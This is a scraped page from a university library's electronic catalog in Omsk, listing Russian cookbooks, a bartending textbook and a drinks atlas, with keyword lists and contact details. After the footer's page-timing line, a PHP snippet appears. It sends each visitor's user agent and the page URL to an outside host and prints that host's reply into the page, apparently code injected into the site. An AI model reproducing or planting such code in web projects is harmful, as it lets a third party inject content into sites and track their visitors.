Поскребышева Г. И. Праздничный стол [Текст] : издания для досуга / Г. И. Поскребышева, 2004. - 191 с.
Держатели документа (Информация об экземплярах) 
13. 
Королевский ужин от Рене. Рыбное меню [Видеозапись, кинофильм, микроформа] : [Видеофильм], 1997. - 1 вк.
Держатели документа (Информация об экземплярах) 
14. 
Иванникова Е. И. Барное дело [Текст] : Учеб. для студ. образоват. учреждений сред. проф. образования / Е. И. Иванникова, Т. В. Иванникова, Г. В. Семенова, 2002. - 346 с.
Ключевые слова 
БАРМЕН -- БАНКЕТ -- ПРИЕМ -- Коктейль - бар -- Десерт - бар -- МЕНЮ -- КАРТА вин -- ВИНОДЕЛИЕ -- ШАМПАНСКОЕ -- ВИНО ВИНОГРАДНОЕ -- Ампелография -- ДЕГУСТАЦИЯ напитков -- КОНЬЯК -- БРЕНДИ -- Водка -- ВИСКИ -- Джин -- Ром -- БАЛЬЗАМ -- Биттер -- ЛИКЕР -- Пиво -- Напиток смешанный -- НАЛИВКА -- НАСТОЙКА -- НАПИТОК десертный -- Пунш -- Грог -- Глинтвейн -- Текила -- Аперитив -- Дижестив -- Квас -- Компот -- Кисель -- Сок -- Морс -- Лимонад -- КРЮШОН -- Кофе -- Какао -- Чай -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК ТОНИЗИРУЮЩИЙ -- НАПИТОК молочный
Держатели документа (Информация об экземплярах) 
15. 
Антонова М. А. Русская кухня [Текст] : издания для досуга / М. А. Антонова, С. В. Антонов, 2004. - 222 с.
Держатели документа (Информация об экземплярах) 
16. 
Обед по-европейски [Текст] : издания для досуга / Сост. Н. Бережных, 2004. - 120 с.
Держатели документа (Информация об экземплярах) 
17. 
Миллион меню. Любимые блюда Востока [Текст] : издания для досуга / Сост. И. А. Кириллова, 2003. - [600 разрезных + 20] с.
Держатели документа (Информация об экземплярах) 
18. 
Миллион меню. Волшебство мировой кулинарии [Текст] : издания для досуга / Сост. И. Ройтенберг, 2003. - [600 разрезных + 20] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
19. 
Миллион меню современной Европы [Текст] : издания для досуга / Сост. О. Шаллер, 2004. - [600 разрезных + 12] с.
Держатели документа (Информация об экземплярах) 
20. 
Заздравная чаша [Текст] : Атлас вин, крепких и слабоалкогольных напитков мира. Домашнее виноделие. Закуски на праздничный стол. Правила сервировки стола и приема гостей. Виды, традиции и обычаи застолий. Вино и здоровье. Вино и любовь. Двадцать знаменитых тостов / Гл. худож. С. В. Богачев. - 399 с.
Ключевые слова 
Алиготе -- Портвейн -- Кагор -- Мадера -- Херес -- Марсала -- Вермут -- Малага -- Токай -- Шампанское -- Дегустация -- Вино -- Водка -- Настойка -- Виски -- Джин -- Ром -- Бренди -- Коньяк -- Бальзам -- Наливка -- Ликер -- Десерт -- Напиток -- Пунш -- Аперитив -- Коктейль -- Грог -- Крюшон -- Глинтвейн -- Пиво -- Сервировка -- Прием -- Банкет -- стол шведский -- Пикник -- Тост -- Юбилей -- Новый год -- Свадьба -- Крестины -- Рождество Христово -- Крещение -- Масленица -- Пасха -- Поминки -- Похмелье
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2903 - 22.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.03 с.12 запросов, 0.63c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;